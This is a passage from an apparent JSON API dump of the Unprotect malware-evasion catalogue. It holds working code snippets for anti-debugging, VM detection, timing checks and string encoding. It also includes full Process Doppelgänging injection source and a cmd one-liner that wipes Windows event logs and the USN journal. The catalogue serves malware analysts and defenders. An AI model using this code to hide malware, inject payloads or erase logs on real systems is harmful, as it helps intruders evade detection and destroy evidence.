@NtSetInformationThread := GetProcAddress(hNtDll, 'NtSetInformationThread');\r\n if NOT Assigned(NtSetInformationThread) then\r\n Exit();\r\n\r\n {\r\n Create an example thread\r\n }\r\n SetLastError(0);\r\n\r\n AThread := CreateThread(nil, 0, @ThreadExample, nil, CREATE_SUSPENDED, AThreadId);\r\n if (AThread <> 0) then begin\r\n WriteLn(Format('Example thread created. Thread Handle: %d , Thread Id: %d', [AThread, AThreadid]));\r\n\r\n HideThread(AThread);\r\n\r\n ///\r\n ResumeThread(AThread);\r\n\r\n WaitForSingleObject(AThread, INFINITE);\r\n end else begin\r\n WriteLn(Format('Could not create example thread with error: .', [GetLastError()]));\r\n end;\r\n finally\r\n FreeLibrary(hNtDll);\r\n end;\r\n except\r\n on E: Exception do\r\n Writeln(E.ClassName, ': ', E.Message);\r\n end;\r\nend."
},
{
"id": 29,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/68/?format=api",
"description": "",
"plain_code": "//source: https://docs.microsoft.com/en-us/windows/win32/psapi/enumerating-all-processes\r\n#include <windows.h>\r\n#include <stdio.h>\r\n#include <tchar.h>\r\n#include <psapi.h>\r\n\r\n// To ensure correct resolution of symbols, add Psapi.lib to TARGETLIBS\r\n// and compile with -DPSAPI_VERSION=1\r\n\r\nvoid PrintProcessNameAndID( DWORD processID )\r\n{\r\n TCHAR szProcessName[MAX_PATH] = TEXT(\"<unknown>\");\r\n\r\n // Get a handle to the process.\r\n\r\n HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION |\r\n PROCESS_VM_READ,\r\n FALSE, processID );\r\n\r\n // Get the process name.\r\n\r\n if (NULL != hProcess )\r\n {\r\n HMODULE hMod;\r\n DWORD cbNeeded;\r\n\r\n if ( EnumProcessModules( hProcess, &hMod, sizeof(hMod), \r\n &cbNeeded) )\r\n {\r\n GetModuleBaseName( hProcess, hMod, szProcessName, \r\n sizeof(szProcessName)/sizeof(TCHAR) );\r\n }\r\n }\r\n\r\n // Print the process name and identifier.\r\n\r\n _tprintf( TEXT(\"%s (PID: %u)\\n\"), szProcessName, processID );\r\n\r\n // Release the handle to the process.\r\n\r\n CloseHandle( hProcess );\r\n}\r\n\r\nint main( void )\r\n{\r\n // Get the list of process identifiers.\r\n\r\n DWORD aProcesses[1024], cbNeeded, cProcesses;\r\n unsigned int i;\r\n\r\n if ( !EnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) )\r\n {\r\n return 1;\r\n }\r\n\r\n\r\n // Calculate how many process identifiers were returned.\r\n\r\n cProcesses = cbNeeded / sizeof(DWORD);\r\n\r\n // Print the name and process identifier for each process.\r\n\r\n for ( i = 0; i < cProcesses; i++ )\r\n {\r\n if( aProcesses[i] != 0 )\r\n {\r\n PrintProcessNameAndID( aProcesses[i] );\r\n }\r\n }\r\n\r\n return 0;\r\n}"
},
{
"id": 26,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/25/?format=api",
"description": "",
"plain_code": "/*\r\n-----------------------------------------------------------------------------\r\n * Created by * lallous <lallousx86@yahoo.com> *\r\n * All rights reserved.\r\n *\r\n * Redistribution and use in source and binary forms, with or without\r\n * modification, are permitted provided that the following conditions\r\n * are met:\r\n * 1. Redistributions of source code must retain the above copyright\r\n * notice, this list of conditions and the following disclaimer.\r\n *\r\n * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS''\r\nAND\r\n * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\r\n * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\r\nPURPOSE\r\n * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE\r\nLIABLE\r\n * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\r\nCONSEQUENTIAL\r\n * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE\r\nGOODS\r\n * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\r\n * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\r\nSTRICT\r\n * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY\r\nWAY\r\n * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY\r\nOF\r\n * SUCH DAMAGE.\r\n *\r\n-----------------------------------------------------------------------------\r\n*/\r\n\r\n// IsInsideVPC's exception filter\r\nDWORD __forceinline IsInsideVPC_exceptionFilter(LPEXCEPTION_POINTERS ep)\r\n{\r\n PCONTEXT ctx = ep->ContextRecord;\r\n\r\n ctx->Ebx = -1; // Not running VPC\r\n ctx->Eip += 4; // skip past the \"call VPC\" opcodes\r\n return EXCEPTION_CONTINUE_EXECUTION;\r\n // we can safely resume execution since we skipped faulty instruction\r\n}\r\n\r\n// high level language friendly version of IsInsideVPC()\r\nbool IsInsideVPC()\r\n{\r\n bool rc = false;\r\n\r\n __try\r\n {\r\n _asm push ebx\r\n _asm mov ebx, 0 // Flag\r\n _asm mov eax, 1 // VPC function number\r\n\r\n // call VPC\r\n _asm __emit 0Fh\r\n _asm __emit 3Fh\r\n _asm __emit 07h\r\n _asm __emit 0Bh\r\n\r\n _asm test ebx, ebx\r\n _asm setz [rc]\r\n _asm pop ebx\r\n }\r\n // The except block shouldn't get triggered if VPC is running!!\r\n __except(IsInsideVPC_exceptionFilter(GetExceptionInformation()))\r\n {\r\n }\r\n\r\n return rc;\r\n}"
},
{
"id": 22,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 5,
"username": "fr0gger",
"email": "thomas.roccia@securitybreak.io",
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/52/?format=api",
"description": "",
"plain_code": "#include <windows.h>\r\n#include <stdio.h>\r\n\r\nint main(int argc, char** argv)\r\n{\r\n\tif (IsDebuggerPresent())\r\n\t{\r\n printf(\"Debugger detected!!\\n\");\r\n\t}\r\n\telse\r\n\t{\r\n\t printf(\"No debugger detected!!\\n\");\r\n\t}\r\n\tsystem(\"pause\");\r\n\treturn 0;\r\n}"
},
{
"id": 23,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 5,
"username": "fr0gger",
"email": "thomas.roccia@securitybreak.io",
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/57/?format=api",
"description": "",
"plain_code": "#include <stdio.h>\r\n#include <Windows.h>\r\n\r\nint main()\r\n{\r\n\tSetLastError(0);\r\n\t\r\n // Send string to the debugger\r\n\tOutputDebugStringA(\"Hello friend\");\r\n\r\n\tif (GetLastError() != 0)\r\n\t{\r\n\t\tprintf(\"Debugger detected!!\\n\");\r\n\t}\r\n system(\"pause\");\r\n\treturn 0;\r\n}"
},
{
"id": 24,
"language": {
"id": 1,
"label": "Delphi",
"code_class": "Delphi"
},
"user": {
"id": 4,
"username": "DarkCoderSc",
"email": "jplesueur@proton.me",
"linkedin": "https://www.linkedin.com/in/jlesueur/",
"twitter": "https://www.twitter.com/darkcodersc",
"website": "https://www.phrozen.io/",
"github": "https://github.com/DarkCoderSc"
},
"technique": "https://unprotect.it/api/techniques/52/?format=api",
"description": "",
"plain_code": "program IsDebuggerPresent;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\nuses\r\n WinAPI.Windows, System.SysUtils;\r\n\r\nbegin\r\n try\r\n if IsDebuggerPresent() then\r\n WriteLn('Process is currently getting debugged.')\r\n else\r\n WriteLn('Process is not likely getting debugged.');\r\n\r\n readln;\r\n except\r\n on E: Exception do\r\n Writeln(E.ClassName, ': ', E.Message);\r\n end;\r\nend."
},
{
"id": 25,
"language": {
"id": 1,
"label": "Delphi",
"code_class": "Delphi"
},
"user": {
"id": 4,
"username": "DarkCoderSc",
"email": "jplesueur@proton.me",
"linkedin": "https://www.linkedin.com/in/jlesueur/",
"twitter": "https://www.twitter.com/darkcodersc",
"website": "https://www.phrozen.io/",
"github": "https://github.com/DarkCoderSc"
},
"technique": "https://unprotect.it/api/techniques/107/?format=api",
"description": "",
"plain_code": "program NtSetDebugFilterState;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\nuses\r\n WinAPI.Windows, System.SysUtils;\r\n\r\nvar\r\n NtSetDebugFilterState : function(AComponentId : ULONG; ALevel : ULONG; AState : Boolean) : NTSTATUS; stdcall;\r\n\r\n hNTDLL : THandle;\r\n AStatus : NTSTATUS;\r\n\r\nbegin\r\n try\r\n hNTDLL := LoadLibrary('ntdll.dll');\r\n if (hNTDLL = 0) then\r\n Exit();\r\n try\r\n @NtSetDebugFilterState := GetProcAddress(hNTDLL, 'NtSetDebugFilterState');\r\n\r\n if NOT Assigned(NtSetDebugFilterState) then\r\n Exit();\r\n\r\n AStatus := NtSetDebugFilterState(0, 0, True);\r\n\r\n writeln(AStatus);\r\n\r\n if (AStatus <> 0) then\r\n WriteLn('Not Debugged.')\r\n else\r\n WriteLn('Debugged.');\r\n finally\r\n FreeLibrary(hNTDLL);\r\n end;\r\n except\r\n on E: Exception do\r\n Writeln(E.ClassName, ': ', E.Message);\r\n end;\r\nend."
},
{
"id": 21,
"language": {
"id": 7,
"label": "cmd",
"code_class": "cmd"
},
"user": {
"id": 5,
"username": "fr0gger",
"email": "thomas.roccia@securitybreak.io",
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/133/?format=api",
"description": "Common commands found in malware.",
"plain_code": "wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:"
},
{
"id": 18,
"language": {
"id": 4,
"label": "Golang",
"code_class": "golang"
},
"user": {
"id": 5,
"username": "fr0gger",
"email": "thomas.roccia@securitybreak.io",
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/8/?format=api",
"description": "",
"plain_code": "package main\r\n\r\nimport (\r\n \"fmt\"\r\n \"log\"\r\n \"net\"\r\n \"strings\"\r\n)\r\n\r\nfunc getMacAddr() ([]string, error) {\r\n ifas, err := net.Interfaces()\r\n if err != nil {\r\n return nil, err\r\n }\r\n var as []string\r\n for _, ifa := range ifas {\r\n a := ifa.HardwareAddr.String()\r\n if a != \"\" {\r\n as = append(as, a)\r\n }\r\n }\r\n return as, nil\r\n}\r\n\r\nfunc main() {\r\n // Blacklist VM mac address\r\n var macvm = []string{\"08:00:27\", \"00:0C:29\", \"00:1C:14\", \"00:50:56\", \"00:05:69\"}\r\n\r\n as, err := getMacAddr()\r\n if err != nil {\r\n log.Fatal(err)\r\n }\r\n\r\n for i, s:= range macvm {\r\n for _, a := range as {\r\n str := strings.ToUpper(a)\r\n if str[0:8] == s[0:8] {\r\n fmt.Println(\"VM detected!\")\r\n\t\tfmt.Println(i, s)\r\n } \r\n }\r\n }\r\n}"
},
{
"id": 19,
"language": {
"id": 6,
"label": "MASM",
"code_class": "x86asm"
},
"user": {
"id": 7,
"username": "Adam",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/Hexacorn",
"website": "https://www.hexacorn.com/",
"github": null
},
"technique": "https://unprotect.it/api/techniques/148/?format=api",
"description": "",
"plain_code": ".586\r\n.MODEL FLAT,STDCALL\r\n include windows.inc\r\n include kernel32.inc\r\n includelib kernel32.lib\r\n include user32.inc\r\n includelib user32.lib\r\n include masm32.inc\r\n includelib masm32.lib\r\n.data\r\n pat db 'rdtscp delta=%d, rdtsc delta=%d',13,10,0\r\n rdtscp_not_supported db 'rdtscp not supported'\r\n.data?\r\n buf db 64 dup (?)\r\n.code\r\nrdtscp macro\r\n db 0Fh, 01h, 0F9h\r\nendm\r\nassume fs:nothing\r\nRDTSCP proc\r\n LOCAL _retval:DWORD\r\n mov _retval,0\r\n pushad\r\n push OFFSET e\r\n push dword ptr fs:[0]\r\n mov dword ptr fs:[0], esp\r\n rdtscp\r\n mov ebx,eax\r\n rdtscp\r\n sub eax,ebx\r\n mov _retval,eax\r\n jmp no_e\r\n e:\r\n mov esp, [esp + 8]\r\n pop dword ptr fs:[0]\r\n add esp, 4\r\n popad\r\n mov _retval,-1\r\n jmp _ret\r\n no_e:\r\n pop dword ptr fs:[0]\r\n add esp, 4\r\n popad\r\n_ret:\r\n mov eax,_retval\r\n ret\r\nRDTSCP endp\r\n Start:\r\n rdtsc\r\n mov ebx,eax\r\n rdtsc\r\n sub eax,ebx\r\n mov ebp,eax\r\n call RDTSCP\r\n .if eax==-1\r\n invoke StdOut,OFFSET rdtscp_not_supported\r\n .else\r\n invoke wsprintfA,OFFSET buf,OFFSET pat,eax,ebp\r\n invoke StdOut,OFFSET buf\r\n .endif\r\n invoke ExitProcess,0\r\nEND Start"
},
{
"id": 20,
"language": {
"id": 1,
"label": "Delphi",
"code_class": "Delphi"
},
"user": {
"id": 4,
"username": "DarkCoderSc",
"email": "jplesueur@proton.me",
"linkedin": "https://www.linkedin.com/in/jlesueur/",
"twitter": "https://www.twitter.com/darkcodersc",
"website": "https://www.phrozen.io/",
"github": "https://github.com/DarkCoderSc"
},
"technique": "https://unprotect.it/api/techniques/57/?format=api",
"description": "",
"plain_code": "program OutputDebugString;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\nuses\r\n WinAPI.Windows,\r\n System.SysUtils;\r\n\r\nvar AErrorValue : Byte;\r\n\r\nbegin\r\n try\r\n randomize;\r\n\r\n AErrorValue := Random(High(Byte));\r\n\r\n SetLastError(AErrorValue);\r\n\r\n OutputDebugStringW('TEST');\r\n\r\n if (GetLastError() = AErrorValue) then\r\n WriteLn('Debugger detected using OutputDebugString() technique.')\r\n else\r\n WriteLn('No debugger detected using OutputDebugString() technique.');\r\n except\r\n on E: Exception do\r\n Writeln(E.ClassName, ': ', E.Message);\r\n end;\r\nend."
},
{
"id": 17,
"language": {
"id": 4,
"label": "Golang",
"code_class": "golang"
},
"user": {
"id": 5,
"username": "fr0gger",
"email": "thomas.roccia@securitybreak.io",
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/97/?format=api",
"description": "",
"plain_code": "package main\r\n\r\nimport (\r\n \"fmt\"\r\n \"os\"\r\n)\r\n\r\nfunc cipher(text string, direction int) string {\r\n\r\n shift, offset := rune(3), rune(26)\r\n\trunes := []rune(text)\r\n\r\n for index, char := range runes {\r\n\t\tswitch direction {\r\n\t\tcase -1: // encoding\r\n\t\t\tif char >= 'a'+shift && char <= 'z' ||\r\n\t\t\t\tchar >= 'A'+shift && char <= 'Z' {\r\n\t\t\t\tchar = char - shift\r\n\t\t\t} else if char >= 'a' && char < 'a'+shift ||\r\n\t\t\t\tchar >= 'A' && char < 'A'+shift {\r\n\t\t\t\tchar = char - shift + offset\r\n\t\t\t}\r\n\t\tcase +1: // decoding\r\n\t\t\tif char >= 'a' && char <= 'z'-shift ||\r\n\t\t\t\tchar >= 'A' && char <= 'Z'-shift {\r\n\t\t\t\tchar = char + shift\r\n\t\t\t} else if char > 'z'-shift && char <= 'z' ||\r\n\t\t\t\tchar > 'Z'-shift && char <= 'Z' {\r\n\t\t\t\tchar = char + shift - offset\r\n\t\t\t}\r\n\t\t}\r\n\t\trunes[index] = char\r\n\t}\r\n\treturn string(runes)\r\n}\r\n\r\nfunc encode(text string) string { return cipher(text, -1) }\r\nfunc decode(text string) string { return cipher(text, +1) }\r\n\r\nfunc main() {\r\n\tsec := os.Args[1]\r\n fmt.Println(\"[+] Clear text: \" + sec)\r\n\tencoded := encode(sec)\r\n\tfmt.Println(\"[+] Encoded: \" + encoded)\r\n\tdecoded := decode(encoded)\r\n\tfmt.Println(\"[+] Decoded: \" + decoded)\r\n}"
},
{
"id": 16,
"language": {
"id": 4,
"label": "Golang",
"code_class": "golang"
},
"user": {
"id": 5,
"username": "fr0gger",
"email": "thomas.roccia@securitybreak.io",
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/96/?format=api",
"description": "This Go program uses the Base64 encoding scheme to encode and decode a string. The program takes a single command line argument, which is the string to be encoded and decoded. The program first uses the base64 package to encode the string using the Standard encoding alphabet. The encoded string is then printed to the screen. The program then decodes the encoded string using the same alphabet, and prints the resulting decoded string to the screen. This example demonstrates how the Base64 encoding scheme can be used to encode and decode binary data in a compact and easily transmitted format. In the context of malware, this technique can be used to conceal payloads or encode network communication in order to avoid detection and analysis.",
"plain_code": "package main\r\n\r\nimport (\r\n \"encoding/base64\"\r\n \"fmt\"\r\n \"os\"\r\n)\r\n\r\nfunc main() {\r\n\r\n arg1 := os.Args[1]\r\n\r\n encoded := base64.StdEncoding.EncodeToString([]byte(arg1))\r\n fmt.Println(encoded)\r\n\r\n decoded, err := base64.StdEncoding.DecodeString(encoded)\r\n if err != nil {\r\n panic(\"error\")\r\n }\r\n fmt.Println(string(decoded))\r\n}"
},
{
"id": 13,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 19,
"username": "External",
"email": "null@localhost",
"linkedin": null,
"twitter": null,
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/119/?format=api",
"description": "The code demonstrates how to perform Process Doppelgänging, a technique that leverages the Transactional NTFS functionality in Windows to overwrite a legitimate file with a malicious file, resulting in a process injection.",
"plain_code": "// Ref = src\r\n// https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf\r\n//\r\n// Credits:\r\n// Vyacheslav Rusakov @swwwolf\r\n// Tom Bonner @thomas_bonner\r\n//\r\n\r\n#include <Windows.h>\r\n#include <ntstatus.h>\r\n#include \"ntos.h\"\r\n\r\nVOID ProcessDoppelgänging(\r\n _In_ LPWSTR lpTargetApp,\r\n _In_ LPWSTR lpPayloadApp)\r\n{\r\n BOOL bCond = FALSE;\r\n NTSTATUS status;\r\n HANDLE hTransaction = NULL, hTransactedFile = INVALID_HANDLE_VALUE, hFile = INVALID_HANDLE_VALUE;\r\n HANDLE hSection = NULL, hProcess = NULL, hThread = NULL;\r\n LARGE_INTEGER fsz;\r\n ULONG ReturnLength = 0;\r\n ULONG_PTR EntryPoint = 0, ImageBase = 0;\r\n PVOID Buffer = NULL, MemoryPtr = NULL;\r\n SIZE_T sz = 0;\r\n PEB *Peb;\r\n\r\n PROCESS_BASIC_INFORMATION pbi;\r\n\r\n PRTL_USER_PROCESS_PARAMETERS ProcessParameters = NULL;\r\n\r\n OBJECT_ATTRIBUTES obja;\r\n UNICODE_STRING ustr;\r\n\r\n BYTE temp[0x1000];\r\n\r\n do {\r\n RtlSecureZeroMemory(&temp, sizeof(temp));\r\n\r\n //\r\n // Create TmTx transaction object.\r\n //\r\n InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);\r\n status = NtCreateTransaction(&hTransaction,\r\n TRANSACTION_ALL_ACCESS,\r\n &obja,\r\n NULL,\r\n NULL,\r\n 0,\r\n 0,\r\n 0,\r\n NULL,\r\n NULL);\r\n\r\n if (!NT_SUCCESS(status)) {\r\n OutputDebugString(L\"NtCreateTransaction fail\");\r\n break;\r\n }\r\n\r\n //\r\n // Open target file for transaction.\r\n //\r\n hTransactedFile = CreateFileTransacted(lpTargetApp,\r\n GENERIC_WRITE | GENERIC_READ,\r\n 0,\r\n NULL,\r\n OPEN_EXISTING,\r\n FILE_ATTRIBUTE_NORMAL,\r\n NULL,\r\n hTransaction,\r\n NULL,\r\n NULL);\r\n\r\n if (hTransactedFile == INVALID_HANDLE_VALUE) {\r\n OutputDebugString(L\"CreateFileTransacted fail\");\r\n break;\r\n }\r\n\r\n //\r\n // Open file payload.\r\n //\r\n hFile = CreateFile(lpPayloadApp,\r\n GENERIC_READ,\r\n 0,\r\n NULL,\r\n OPEN_EXISTING,\r\n FILE_ATTRIBUTE_NORMAL,\r\n NULL);\r\n if (hFile == INVALID_HANDLE_VALUE) {\r\n OutputDebugString(L\"CreateFile(target) failed\");\r\n break;\r\n }\r\n\r\n //\r\n // Query payload file size.\r\n //\r\n if (!GetFileSizeEx(hFile, &fsz)) {\r\n OutputDebugString(L\"GetFileSizeEx(target) failed\");\r\n break;\r\n }\r\n\r\n //\r\n // Allocate buffer for payload file.\r\n //\r\n Buffer = NULL;\r\n sz = (SIZE_T)fsz.LowPart;\r\n status = NtAllocateVirtualMemory(NtCurrentProcess(),\r\n &Buffer,\r\n 0,\r\n &sz,\r\n MEM_COMMIT | MEM_RESERVE,\r\n PAGE_READWRITE);\r\n\r\n if (!NT_SUCCESS(status)) {\r\n OutputDebugString(L\"NtAllocateVirtualMemory(fsz.LowPart) failed\");\r\n break;\r\n }\r\n\r\n //\r\n // Read payload file to the buffer.\r\n //\r\n if (!ReadFile(hFile, Buffer, fsz.LowPart, &ReturnLength, NULL)) {\r\n OutputDebugString(L\"ReadFile(hFile, Buffer) failed\");\r\n break;\r\n }\r\n\r\n CloseHandle(hFile);\r\n hFile = INVALID_HANDLE_VALUE;\r\n\r\n //\r\n // Write buffer into transaction.\r\n //\r\n if (!WriteFile(hTransactedFile, Buffer, fsz.LowPart, &ReturnLength, NULL)) {\r\n OutputDebugString(L\"WriteFile(hTransactedFile, Buffer) failed\");\r\n break;\r\n }\r\n\r\n //\r\n // Create section from transacted file.\r\n //\r\n status = NtCreateSection(&hSection,\r\n SECTION_ALL_ACCESS,\r\n NULL,\r\n 0,\r\n PAGE_READONLY,\r\n SEC_IMAGE,\r\n hTransactedFile);\r\n if (!NT_SUCCESS(status)) {\r\n OutputDebugString(L\"NtCreateSection(hTransactedFile) failed\");\r\n break;\r\n }\r\n\r\n status = NtRollbackTransaction(hTransaction, TRUE);\r\n if (!NT_SUCCESS(status)) {\r\n OutputDebugString(L\"NtRollbackTransaction(hTransaction) failed\");\r\n break;\r\n }\r\n\r\n NtClose(hTransaction);\r\n hTransaction = NULL;\r\n\r\n CloseHandle(hTransactedFile);\r\n hTransactedFile = INVALID_HANDLE_VALUE;\r\n\r\n //\r\n // Create process object with transacted section.\r\n //\r\n //\r\n // Warning: due to MS brilliant coding skills (NULL ptr dereference) \r\n // this call will trigger BSOD on Windows 10 prior to RS3.\r\n //\r\n hProcess = NULL;\r\n status = NtCreateProcessEx(&hProcess,\r\n PROCESS_ALL_ACCESS,\r\n NULL,\r\n NtCurrentProcess(),\r\n PS_INHERIT_HANDLES,\r\n hSection,\r\n NULL,\r\n NULL,\r\n FALSE);\r\n\r\n if (!NT_SUCCESS(status)) {\r\n OutputDebugString(L\"NtCreateProcessEx(hSection) failed\");\r\n break;\r\n }\r\n\r\n //\r\n // Query payload file entry point value.\r\n //\r\n status = NtQueryInformationProcess(hProcess,\r\n ProcessBasicInformation,\r\n &pbi,\r\n sizeof(PROCESS_BASIC_INFORMATION),\r\n &ReturnLength);\r\n\r\n if (!NT_SUCCESS(status)) {\r\n OutputDebugString(L\"NtQueryInformationProcess failed\");\r\n break;\r\n }\r\n\r\n status = NtReadVirtualMemory(hProcess, pbi.PebBaseAddress, &temp, 0x1000, &sz);\r\n if (!NT_SUCCESS(status)) {\r\n OutputDebugString(L\"NtReadVirtualMemory failed\");\r\n break;\r\n }\r\n\r\n EntryPoint = (ULONG_PTR)RtlImageNtHeader(Buffer)->OptionalHeader.AddressOfEntryPoint;\r\n EntryPoint += (ULONG_PTR)((PPEB)temp)->ImageBaseAddress;\r\n\r\n //\r\n // Create process parameters block.\r\n //\r\n //RtlInitUnicodeString(&ustr, L\"C:\\\\windows\\\\system32\\\\svchost.exe\");\r\n RtlInitUnicodeString(&ustr, lpTargetApp);\r\n status = RtlCreateProcessParametersEx(&ProcessParameters,\r\n &ustr,\r\n NULL,\r\n NULL,\r\n &ustr,\r\n NULL,\r\n NULL,\r\n NULL,\r\n NULL,\r\n NULL,\r\n RTL_USER_PROC_PARAMS_NORMALIZED);\r\n\r\n if (!NT_SUCCESS(status)) {\r\n OutputDebugString(L\"RtlCreateProcessParametersEx failed\");\r\n break;\r\n }\r\n\r\n //\r\n // Allocate memory in target process and write process parameters block.\r\n //\r\n sz = ProcessParameters->EnvironmentSize + ProcessParameters->MaximumLength;\r\n MemoryPtr = ProcessParameters;\r\n\r\n status = NtAllocateVirtualMemory(hProcess,\r\n &MemoryPtr,\r\n 0,\r\n &sz,\r\n MEM_RESERVE | MEM_COMMIT,\r\n PAGE_READWRITE);\r\n\r\n if (!NT_SUCCESS(status)) {\r\n OutputDebugString(L\"NtAllocateVirtualMemory(ProcessParameters) failed\");\r\n break;\r\n }\r\n\r\n sz = 0;\r\n status = NtWriteVirtualMemory(hProcess,\r\n ProcessParameters,\r\n ProcessParameters,\r\n ProcessParameters->EnvironmentSize + ProcessParameters->MaximumLength,\r\n &sz);\r\n\r\n if (!NT_SUCCESS(status)) {\r\n OutputDebugString(L\"NtWriteVirtualMemory(ProcessParameters) failed\");\r\n break;\r\n }\r\n\r\n //\r\n // Update PEB->ProcessParameters pointer to newly allocated block.\r\n //\r\n Peb = pbi.PebBaseAddress;\r\n status = NtWriteVirtualMemory(hProcess,\r\n &Peb->ProcessParameters,\r\n &ProcessParameters,\r\n sizeof(PVOID),\r\n &sz);\r\n if (!NT_SUCCESS(status)) {\r\n OutputDebugString(L\"NtWriteVirtualMemory(Peb->ProcessParameters) failed\");\r\n break;\r\n }\r\n\r\n //\r\n // Create primary thread.\r\n //\r\n hThread = NULL;\r\n status = NtCreateThreadEx(&hThread,\r\n THREAD_ALL_ACCESS,\r\n NULL,\r\n hProcess,\r\n (LPTHREAD_START_ROUTINE)EntryPoint,\r\n NULL,\r\n FALSE,\r\n 0,\r\n 0,\r\n 0,\r\n NULL);\r\n if (!NT_SUCCESS(status)) {\r\n OutputDebugString(L\"NtCreateThreadEx(EntryPoint) failed\");\r\n break;\r\n }\r\n\r\n } while (bCond);\r\n\r\n if (hTransaction)\r\n NtClose(hTransaction);\r\n if (hSection)\r\n NtClose(hSection);\r\n if (hProcess)\r\n NtClose(hProcess);\r\n if (hThread)\r\n NtClose(hThread);\r\n if (hTransactedFile != INVALID_HANDLE_VALUE)\r\n CloseHandle(hTransactedFile);\r\n if (hFile != INVALID_HANDLE_VALUE)\r\n CloseHandle(hFile);\r\n if (Buffer != NULL) {\r\n sz = 0;\r\n NtFreeVirtualMemory(NtCurrentProcess(), &Buffer, &sz, MEM_RELEASE);\r\n }\r\n if (ProcessParameters) {\r\n RtlDestroyProcessParameters(ProcessParameters);\r\n }\r\n}\r\n\r\nvoid main()\r\n{\r\n ProcessDoppelgänging(L\"C:\\\\test\\\\target.exe\", L\"C:\\\\test\\\\payload.exe\");\r\n ExitProcess(0);\r\n}"
},
{
"id": 14,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/58/?format=api",
"description": "",
"plain_code": "#define WIN32_LEAN_AND_MEAN\r\n#include <stdio.h>\r\n#include <iostream>\r\n#include <stdlib.h>\r\n#include <windows.h>\r\n#include \"defs.h\"\r\n\r\n\r\n#pragma comment(lib,\"ntdll.lib\")\r\n#pragma comment(lib,\"psapi.lib\")\r\n\r\n\r\nvoid QueryProcessHeapMethod(void)\r\n{\r\n PDEBUG_BUFFER buffer;\r\n buffer = RtlCreateQueryDebugBuffer(0,FALSE);\r\n RtlQueryProcessHeapInformation(buffer);\r\n\r\n if (buffer->RemoteSectionBase == (PVOID) 0x50000062){\r\n MessageBoxA(NULL,\"Debugged\",\"Warning\",MB_OK);\r\n }\r\n else {\r\n MessageBoxA(NULL,\"Not Debugged\",\"Warning\",MB_OK);\r\n }\r\n if (buffer->EventPairHandle == (PVOID) 0x00002b98) {\r\n MessageBoxA(NULL,\"Debugged\",\"Warning\",MB_OK);\r\n }\r\n else {\r\n MessageBoxA(NULL,\"Not Debugged\",\"Warning\",MB_OK);\r\n printf(\"EventPairHandle= %x\",(int)buffer->EventPairHandle);\r\n }\r\n}\r\nint main()\r\n{\r\n QueryProcessHeapMethod();\r\n return (EXIT_SUCCESS);\r\n}"
},
{
"id": 15,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 5,
"username": "fr0gger",
"email": "thomas.roccia@securitybreak.io",
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
